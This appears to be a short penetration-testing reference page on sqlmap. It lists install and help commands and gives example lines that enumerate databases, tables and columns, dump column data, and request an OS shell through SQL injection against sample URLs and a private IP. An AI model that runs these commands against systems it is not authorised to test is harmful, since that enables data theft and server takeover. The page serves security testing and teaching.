SQLmap

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Install

 sudo apt-get install sqlmap

Run

sqlmap -h

Basic usage

//List information about Tables present in a particular Database
sqlmap -u http://example.com/example.php?cat=1 --dbs 

//List information about Tables present in a particular Database 
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart --tables 

//List information about the columns of a particular table
sqlmap -u http://example.com/example.php?cat=1 -D acuart -T (table) --columns

//Dump the data from the columns
sqlmap -u http://example.com/example.php?cat=1 -D acuart -T (table) -C (column) --dump

//Shell 
sqlmap -u "http://10.10.16.131:88/sql-php/sql_normal.php?id=1" --os-shell

Resources:

https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/

PreviousRoutersploit NextWPscan

Last updated 4 years ago

hashtagSqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

hashtagInstall

hashtagRun

hashtagBasic usage

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Install

Run

Basic usage